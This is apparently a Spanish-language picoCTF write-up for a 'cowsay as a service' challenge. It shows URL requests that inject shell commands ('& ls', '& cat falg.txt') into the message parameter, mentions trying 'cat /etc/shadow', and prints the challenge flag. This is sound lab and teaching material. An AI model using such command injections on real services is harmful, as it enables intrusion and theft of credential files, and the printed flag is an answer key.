caas
caas Author: BrownieInMotion Description Now presenting cowsay as a service
Si abrimos el enlace de la web, nos aparecerá lo que parecen unas indicaciones para utilizar este servicio
1
2
3
Cowsay as a Service
Make a request to the following URL to cowsay your message:
https://caas.mars.picoctf.net/cowsay/{message}
Supongo que tenemos que explotar de alguna manera el hecho de que podemos insertar en message algún comando. Que tal si pruebo algo como “holaquetal & cat /etc/shadow”, comienzo con un simple ls y encuentrro
1
https://caas.mars.picoctf.net/cowsay/hello%20&%20ls
Añadiendo el ls podemos ver un archivo interesante falg.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Dockerfile
falg.txt
index.js
node_modules
package.json
public
yarn.lock
_______
< hello >
-------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
https://caas.mars.picoctf.net/cowsay/hello%20&%20cat%20falg.txt
1
2
3
4
5
6
7
8
9
picoCTF{moooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0o}
_______
< hello >
-------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
flag: picoCTF{moooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0o}
Esta entrada está licenciada bajo CC BY 4.0 por el autor.